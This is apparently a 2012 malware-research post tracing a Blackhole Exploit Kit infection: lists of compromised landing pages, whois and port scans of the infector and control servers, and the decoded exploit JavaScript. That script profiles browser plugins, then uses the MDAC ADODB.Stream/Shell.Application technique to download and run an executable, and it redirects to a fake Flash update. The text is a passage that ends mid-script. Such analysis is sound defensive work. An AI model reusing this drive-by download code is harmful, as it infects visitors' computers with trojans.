=====================================================
#MalwareMustDie!!!!!!!!!!!! | Sat Oct 27 18:29:21 JST 2012
FreeBSD unixfreaxjp 9.0-RELEASE-p4 FreeBSD 9.0-RELEASE-p4 #
This is the large infection of BHEK2 hinted by @xxxxrxero followed by @unixfreaxjp
Hit by MDAC Exploit Infection & Downloaded the Trojan, Backdoor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
I am pretty sure this one as ZeuS, since Detection Ratio of VT still too low.
url: h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
Also drops other troj: h00p://4.icedambusters.com/adobe/update_flash_player.exe
Referer are to: 74.200.211.205
CNC: 198.143.159.66
After infected by 03ab326.exe it also dwonloaded THREE MORE TROJANS from:
h00p://springbackcolorado.com/CaBPXFg.exe
h00p://180degrees.org.nz/cXbAC.exe
h00p://weareseasons.com/7yoZf5.exe
PluginDetect VT(5/44): h00ps://www.virustotal.com/file/ebf5a59e4f7212cca87a6b6bf9d646189674f40c3d0f765a2adf62b9ba0a9ca4/analysis/1351330706/
Troj Downloader VT(8/44): h00ps://www.virustotal.com/file/94258a10d190c941b697246453974bd892f63c77880073674ee1759fa550f5b8/analysis/1351330579/
The Trojan Zbot(Main) VT(4/44): h00ps://www.virustotal.com/file/166c1a35cf4f24e3678ad0d2c863b95d8a49448915bfcf31eccb5412d9b1ca8e/analysis/1351330452/
======================================================
========================
INFECTIONS SCHEME
========================
#include Hint: HINT.TXT;
---------------------------------------------------------------------------------------------------------------------------...
LANDING PAGE JS.JS PLUGIN DETECT OBFS
---------------------------------------------------------------------------------------------------------------------------...
h00p://50.63.137.176/8jorLtGh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://a1stopshop.in/DAE4v3m/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://acura.hightestonline.com/2cE8GLPY/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://agriculturaenmarcha.com/5tNBJdC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://blt-photography.com/9UEazEmw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://cefoai.com/9TFzUf/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://churchjef.com/3Mn4rs/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://elefti.com/4yxcpfn/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://estoesxicotepec.com.mx/1dKmuBp8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://financialportal.co.za/1G6V26b/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://kocaudio.com/yaxF05nC/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://agritech.com.ve/MtkRFd3k/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
h00p://infotrex.com/bq9MGi/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://interambiente.altervista.org/88DTb1S7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://littlecreekinc.com/9LAfwJz/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://motosikletsasesi.com/11qX8KCB/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://netguandisenoweb.com/1fp3PP/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://new.artofimagination.com/5dLS24/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://oneryavuz.com/abMBVR/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://optikcim.com/5RRvjA8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://ortizplans.com/43wKes/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://pose-frette.gmxhome.de/66jzk4q/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://potter.com.hk/6UTxen/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://rajiv.stealbackyourppcprofits.com/AtdNGGH/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://rapblast.com/Af1Msc/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://safeguardlcs.com/M90nh9/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://sanypet.it/7hKxQao/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://southsnetball.asn.au/21drY7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://superiorshine-carwash.com/5M2M4Mh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://testsites1.com/9bMNvy/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://trailblazers.org/8AvgUm/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://tranzzactn.com/075V7po/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://ventanasdesanmiguel.net/3ADRuw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.alicil.com/0yUWvU/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.emiliacenterdownload.com/3p9rovT/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.jonespark.com/46YdTk/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.prettyleg.idv.tw/dvYhPu/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://www.rosesocietyjbp.com/1xt74Jy1/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://yesilhoca.com/09DFUG7F/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
h00p://zalesie-gorne.home.pl/0qU3MX/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
==================================
INFECTOR DETAILS;
74.200.211.205
==================================
NetRange: 74.200.192.0 - 74.200.255.255
CIDR: 74.200.192.0/18
OriginAS: AS16805, AS22576
NetName: LAYERED-TECH-CHI
NetHandle: NET-74-200-192-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-11-14
Updated: 2012-02-24
Ref: h00p://whois.arin.net/rest/net/NET-74-200-192-0-1
OrgName: Layered Technologies, Inc.
OrgId: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
RegDate: 2004-07-21
Updated: 2010-08-13
Comment: Please send all abuse complaints to abuse@layeredtech.com
Ref: h00p://whois.arin.net/rest/org/LAYER-3
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
26/tcp closed unknown
53/tcp open domain
80/tcp open h00p
110/tcp open pop3
143/tcp closed imap
443/tcp open h00ps
587/tcp open submission
993/tcp closed imaps
995/tcp closed pop3s
No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B9336%O=21%C=26)
TSeq(Class=TR%IPID=I%TS=0)
T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
==================================
CNC / CONTROL DETAILS;
IP: 198.143.159.66
==================================
IP: 198.143.159.66
NetRange: 198.143.128.0 - 198.143.191.255
CIDR: 198.143.128.0/18
OriginAS: AS32475
NetName: SINGLEHOP
NetHandle: NET-198-143-128-0-1
Parent: NET-198-0-0-0-0
NetType: Direct Allocation
RegDate: 2012-05-16
Updated: 2012-05-16
Ref: h00p://whois.arin.net/rest/net/NET-198-143-128-0-1
OrgName: SingleHop, Inc.
OrgId: SINGL-8
Address: 621 W. Randolph St.
Address: 3rd Floor
City: Chicago
StateProv: IL
PostalCode: 60661
Country: US
RegDate: 2007-03-07
Updated: 2010-03-23
Comment: h00p://www.singlehop.com/
Ref: h00p://whois.arin.net/rest/org/SINGL-8
PORT STATE SERVICE
22/tcp open ssh
80/tcp open h00p
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B94D1%O=22%C=1)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=3890%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
============================================
Grab the pluginDetect & you get the CNC!
============================================
$ myfetch --h00p_proxy=yes
--user-agent="Mozila/4.3(X11; U; MacOSX)"
--cookies=on --keep-session-cookies --save-cookies mycookies.txt
--referer="h00p://74.200.211.205/SQeyUUzT/js.js" "
--target="h00p://ser.luckypetspetsitting.com/links/return-west.php"
// w/tor
--16:21:02-- h00p://ser.luckypetspetsitting.com/links/return-west.php
=> `return-west.php'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 502 Bad Gateway
16:21:14 ERROR 502: Bad Gateway.
// gatling IP
--16:21:34-- h00p://ser.luckypetspetsitting.com/links/return-west.php
=> `return-west.php'
Resolving ser.luckypetspetsitting.com... 198.143.159.66
Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: unspecified [text/html]
16:21:37 (131.58 KB/s) - `return-west.php' saved [28878]
============================
DECODING ANALYSIS
===========================
//Wepawet OK, jsunpack BAD, Malzilla OK, Revello BAD, SteamDumper OK
---------------------------------------------------------------------------------------
// BHEK2 Plugin Detect.....these morons never learns...
// I won't spend my time to PDF and jar I aimed straingt PE infectors..
// You guys can go ahead with jar and PDF
// rgds, @unixfreaxjp
try {
var PluginDetect = {
version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
return function (){
c(b, a)
}
}
, isDefined : function (b){
return typeof b != "undefined"
}
, isArray : function (b){
return (/array/i).test(Object.prototype.toString.call(b))
}
, isFunc : function (b){
return typeof b == "function"
}
, isString : function (b){
return typeof b == "string"
}
, isNum : function (b){
return typeof b == "number"
}
, isStrNum : function (b){
return (typeof b == "string" && (/\d/).test(b))
}
, getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,
getNum : function (b, c){
var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
exec(b) : null;
return a ? a[0] : null
}
, compareNums : function (h, f, d){
var e = this , c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)){
if (e.isDefined(d) && d.compareNums){
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length);
a ++ ){
if (g(c[a], 10) > g(b[a], 10)){
return 1
}
if (g(c[a], 10) < g(b[a], 10)){
return - 1
}
}
}
return 0
}
, formatNum : function (b, c){
var d = this , a, e;
if (!d.isStrNum(b)){
return null
}
if (!d.isNum(c)){
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a ++ ){
if (/^(0+)(.+)$/.test(e[a])){
e[a] = RegExp.$2
}
if (a > c ||! (/\d/).test(e[a])){
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
}
, $$hasMimeType : function (a){
return function (c){
if (!a.isIE && c){
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b ++ ){
if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)){
return f
}
}
}
}
return null
}
}
, findNavPlugin : function (l, e, c){
var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
for (f = 0; f < a.length; f ++ ){
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
if (!k ||! (k.test(m) || k.test(b))){
return a[f]
}
}
}
return null
}
, getMimeEnabledPlugin : function (k, m, c){
var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d ++ ){
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)){
if (!g ||! (g.test(l) || g.test(a))){
return f
}
}
}
}
return 0
}
, getPluginFileVersion : function (f, b){
var h = this , e, d, g, a, c =- 1;
if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
return b
}
if (!b){
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a ++ ){
if (c >- 1 && a > c && d[a] != "0"){
return b
}
if (g[a] != d[a]){
if (c ==- 1){
c = a
}
if (d[a] != "0"){
return b
}
}
}
return e
}
, AXO : window.ActiveXObject, getAXO : function (a){
var f = null, d, b = this , c = {
}
;
try {
f = new b.AXO(a)
}
catch (d){
}
return f
}
, convertFuncs : function (f){
var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
for (ain f){
if (b.test(a)){
try {
g = a.slice(2);
if (g.length > 0 &&! f[g]){
f[g] = f[a](f);
deletef[a]
}
}
catch (d){
}
}
}
}
, initObj : function (e, b, d){
var a, c;
if (e){
if (e[b[0]] == 1 || d){
for (a = 0; a < b.length; a = a + 2){
e[b[a]] = b[a + 1]
}
}
for (ain e){
c = e[a];
if (c && c[b[0]] == 1){
this .initObj(c, b)
}
}
}
}
, initScript : function (){
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (fin c.Plugins){
if (c.Plugins[f]){
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
}
;
c.OS = 100;
if (b){
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
, 100];
for (f = d.length - 2; f >= 0; f = f - 2){
if (d[f] && new RegExp(d[f], "i").test(b)){
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
null ;
c.ActiveXEnabled = false;
if (c.isIE){
var f, j = ["Msxml2.XMLh00p", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
"Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f ++ ){
if (c.getAXO(j[f])){
c.ActiveXEnabled = true;
break
}
}
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
}
, init : function (d){
var c = this , b, d, a = {
status :- 3, plugin : 0
}
;
if (!c.isString(d)){
return a
}
if (d.length == 1){
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b ||! b.getVersion){
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)){
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
a.status =- 2;
return a
}
a.status = 1;
return a
}
, fPush : function (b, a){
var c = this ;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
])))){
a.push(b)
}
}
, callArray : function (b){
var c = this , a;
if (c.isArray(b)){
for (a = 0; a < b.length; a ++ ){
if (b[a] === null){
return
}
c.call(b[a]);
b[a] = null
}
}
}
, call : function (c){
var b = this , a = b.isArray(c) ? c.length :- 1;
if (a > 0 && b.isFunc(c[0])){
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
}
else {
if (b.isFunc(c)){
c(b)
}
}
}
, getVersionDelimiter : ",", $$getVersion : function (a){
return function (g, d, c){
var e = a.init(g), f, b, h = {
}
;
if (e.status < 0){
return null
}
;
f = e.plugin;
if (f.getVersionDone != 1){
f.getVersion(null, d, c);
if (f.getVersionDone === null){
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
}
, cleanup : function (){
}
, addWinEvent : function (d, c){
var e = this , a = window, b;
if (e.isFunc(c)){
if (a.addEventListener){
a.addEventListener(d, c, false)
}
else {
if (a.attachEvent){
a.attachEvent("on" + d, c)
}
else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
}
, winHandler : function (d, c){
return function (){
d();
if (typeof c == "function"){
c()
}
}
}
, WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
var b = {
}
;
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv){
a.onDoneEmptyDiv()
}
}
, winLoaded : false, $$onWindowLoaded : function (a){
return function (b){
if (a.winLoaded){
a.call(b)
}
else {
a.fPush(b, a.WLfuncs)
}
}
}
, div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
function (){
var d = this , b, h, c, a, f, g;
if (d.div && d.div.childNodes){
for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
c = d.div.childNodes[b];
if (c && c.childNodes){
for (h = c.childNodes.length - 1; h >= 0; h -- ){
g = c.childNodes[h];
try {
c.removeChild(g)
}
catch (f){
}
}
}
if (c){
try {
d.div.removeChild(c)
}
catch (f){
}
}
}
}
if (!d.div){
a = document.getElementById(d.divID);
if (a){
d.div = a
}
}
if (d.div && d.div.parentNode){
try {
d.div.parentNode.removeChild(d.div)
}
catch (f){
}
d.div = null
}
}
, DONEfuncs : [], onDoneEmptyDiv : function (){
var c = this , a, b;
if (!c.winLoaded){
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
return
}
for (ain c){
b = c[a];
if (b && b.funcs){
if (b.OTF == 3){
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a ++ ){
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
}
, getWidth : function (c){
if (c){
var a = c.scrollWidth || c.offsetWidth, b = this ;
if (b.isNum(a)){
return a
}
}
return - 1
}
, getTagStatus : function (m, g, a, b){
var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
g.span, i = c.getWidth(d);
if (!k ||! h ||! d ||! c.getDOMobj(m)){
return - 2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
return 0
}
if (l >= i){
return - 1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
if (!m.winLoaded && c.winLoaded){
return 1
}
if (m.winLoaded && c.isNum(b)){
if (!c.isNum(m.count)){
m.count = b
}
if (b - m.count >= 10){
return 1
}
}
}
}
catch (f){
}
return 0
}
, getDOMobj : function (g, a){
var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
try {
if (b && a){
d.div.focus()
}
}
catch (f){
}
return b ? c.firstChild : null
}
, setStyle : function (b, g){
var f = b.style, a, d, c = this ;
if (f && g){
for (a = 0; a < g.length; a = a + 2){
try {
f[g[a]] = g[a + 1]
}
catch (d){
}
}
}
}
, insertDivInBody : function (a, i){
var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
if (!g){
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
}
catch (h){
}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g){
if (g.firstChild && f.isDefined(g.insertBefore)){
g.insertBefore(a, g.firstChild)
}
else {
g.appendChild(a)
}
if (d){
g.removeChild(d)
}
}
else {
}
}
, insertHTML : function (g, b, h, a, l){
var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
"0px", "visibility", "visible"];
var i =
"outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)){
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)){
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2){
if (/[^\s]/.test(b[o + 1])){
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2){
if (/[^\s]/.test(h[o + 1])){
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
}
else {
q = a
}
if (!k.div){
j = n.getElementById(k.divID);
if (j){
k.div = j
}
else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
+ "px", "verticalAlign", "baseline", "display", "block"]));
if (!j){
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode){
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
}
catch (m){
}
;
try {
k.div.appendChild(p)
}
catch (m){
}
;
return {
span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
}
}
return {
span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
}
}
, Plugins : {
adobereader : {
mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
"PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
{
}
, pluginHasMimeType : function (d, c, f){
var b = this , e = b.$, a;
for (ain d){
if (d[a] && d[a].type && d[a].type == c){
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)){
return 1
}
return 0
}
, getVersion : function (l, j){
var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
if (d.isString(j)){
j = j.replace(/\s/g, "");
if (j){
k = j
}
}
else {
j = null
}
if (d.isDefined(g.INSTALLED[k])){
g.installed = g.INSTALLED[k];
return
}
if (!d.isIE){
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0){
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j){
n = b
}
if (!b && d.hasMimeType(g.mimeType)){
b = d.findNavPlugin(a, 0)
}
if (b){
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1){
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
h = "9"
}
else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
h = "8"
}
}
}
}
}
else {
h = g.version
}
if (!d.isDefined(n)){
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
}
else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c =/=\ s * ([ \ d \ .] + ) / g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
""], "", g))).GetVersions();
for (m = 0; m < 5; m ++ ){
if (c.test(f) && (!h || RegExp.$1 > h)){
h = RegExp.$1
}
}
}
catch (i){
}
g.installed = h ? 1 : (b ? 0 :- 1)
}
if (!g.version){
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
}
, zz : 0
}
}
;
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
}
catch (e){
}
if (typeof pdfver == 'string'){
pdfver = pdfver.split('.')
}
else {
pdfver = [0, 0, 0, 0]
}
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i) - 46).toString(16);
if (k.length == 1)k = "0" + k;
d.push(k);
}
;
return d.join("");
}
end_redirect = function (){
window.location.href = 'h00p://4.icedambusters.com/adobe/update_flash_player.exe';
}
;
window.onbeforeunload = function (){
return "";
}
;
try {
var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
ra3.setAttribute("id", ra3);
ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
try {
var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), ""), ra1 = ra3.CreateObject(
"Shell.Application", ""), ra2 = ra3.CreateObject("msxml2.XMLh00p", "");
try {
ra2.open("GET", "
h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy", false);
ra2.send();
ra0.type = 1;
ra0.open();
ra0.Write(ra2.responseBody);
ra0.SaveToFile(ra4, 2);
ra0.Close();
}
catch (e){
}
try {
with (ra1){
shellexecute(ra4);
}
}
